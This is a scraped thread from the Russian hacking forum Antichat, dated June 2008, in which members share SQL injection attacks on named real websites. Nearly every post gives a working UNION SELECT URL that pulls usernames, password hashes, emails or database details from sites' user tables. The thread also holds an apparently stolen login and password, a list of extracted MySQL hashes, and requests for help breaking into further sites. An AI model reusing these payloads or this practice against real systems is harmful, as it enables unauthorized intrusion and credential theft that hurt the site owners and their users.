Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.06.2008, 22:05
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
http://www.weed.ru/pphlogger/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,vers ion(),null,null,null,null,null,null,null,null,null ,null,null,null,
null,null,null,null,null,null,null,null,null%20fro m%20pphl_users%20limit%200,1&action=edit
PS: auth:
имя: blacksun
пароль: B1kC9i4P
|
|
|
05.06.2008, 00:40
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
sql иньекциях не силен по этому и хочу разобраться чё к чему
www.rayner.com
Поехали)
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9+from+mysq l.user/*
5.0.32-Debian_7etch1-log
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,user,5,6,7,8,9+from+mysql.use r/*
Даёт user их 5.
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,password,5,6,7,8,9+from+mysql .user/*
а по такому запросу пишет как я по нимаю пароли в зашифровки mb5.
*0EF29B1AED94CC60062FED7F4DF2224A0C880A10
*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD
*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83
*8050739003BBDB60551FA99B5FFF34957C4F5F49
Тек ли это и стоит ли тратить време на их расшифровку???  |
|
|
|
05.06.2008, 01:29
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
Код:
http://zoorinok.com.ua/zoo_details.php?id=-9061+union+select+1,2,3,4,5,6,7,8,9,0,1,concat_ws(char(58),username,user_password,user_icq,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5+from+phpbb_users/*
|
|
|
|
05.06.2008, 01:46
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 28
Провел на форуме:
245927
Репутация:
55
|
|
www.pilot-film.com
http://www.pilot-film.com/index.php?p=show_person&pid=-2+union+select+1,2,3,4,5,6,7,8,9,10/*
|
|
|
|
05.06.2008, 01:59
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
tor4)
это не MD5, это mysql(des..) тебе сюда http://forum.antichat.ru/thread12768.html
или.. вытаскивай пароли админов сайтов. например:
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,concat_ws(0x3a,loginname,pass word),5,6,7,8,9+from+db2908_phplist.admin/*
rayner.com/stats
или можно вобще весь сервак похекать..
Apache/2.2.3 (Debian) PHP/4.4.4-8+etch4 mod_ssl/2.2.3 OpenSSL/0.9.8c Server at www.rayner.com Port 80
уязвимость - Apache Mod SSL Util UUEncode Binary Stack Buffer Overflow Vulnerability
+ еще есть ХСС.. и BlindSQL.
наврено сайт для тренеровки сделан 
Последний раз редактировалось sabe; 05.06.2008 в 02:20..
|
|
|
|
05.06.2008, 06:51
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
пока разбеаюсь с этой:
http://www.inderscience.com/mapper.php?id=31'+union+select+1/*
Последний раз редактировалось sabe; 06.06.2008 в 00:08..
|
|
|
|
05.06.2008, 11:57
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
www.saltillo.com
Уязвимость:
Код:
http://www.saltillo.com/products/index.php?product=36&product_id=15'
Столбцы:
Код:
http://www.saltillo.com/products/index.php?product=36&product_id=15+union+select+1,2,3,4,5,6,7,8,9,0/*
Информация:
Код:
4.0.27-log
contentdata
saltillo@localhost
P.S. скиньте в пм ссылки на инфу о инжектах в 4ых базах |
|
|
|
05.06.2008, 15:09
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Помогите..
Вобщем Http://truba.karelia.ru
просто добавил к этому http://truba.karelia.ru/ls_server
и получилось
error:
MySql error: Unknown column 'shuric' in 'where clause'
query: SELECT `ls_folders`.`folder_id`, `ls_folders`.`folder_name`, `ls_folders`.`system_folder`, `ls_contacts`.`user_passport_login`, `ls_contacts`.`contact_passport_login`, `ls_contacts`.`contact_name`, `ls_contacts`.`message_size`, `ls_contacts`.`create` FROM `ls_contacts` LEFT JOIN `ls_folders` ON `ls_contacts`.`folder_id`=`ls_folders`.`folder_id` WHERE `ls_contacts`.`contact_id`=shuric AND `ls_contacts`.`user_passport_login`='romanp' LIMIT 1
Может кто поможет че нить придумать с этим сайтиком?
|
|
|
|
05.06.2008, 17:12
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Cantonrep.com
http://www.cantonrep.com/index.php?ID=1'+union+select+1,2,AES_DECRYPT(AES_E NCRYPT(CONCAT(0x7873716C696E6A626567696E,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716 C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13 ,14/*
токо она слепая.. что можно сделать?
Последний раз редактировалось sabe; 05.06.2008 в 22:12..
|
|
|
|
05.06.2008, 17:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Сообщение от sabe
Cantonrep.com
подбираю.. помощь приветствуется..)
http://www.cantonrep.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14/*
слепая чтоли?
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 05.06.2008 в 17:32..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
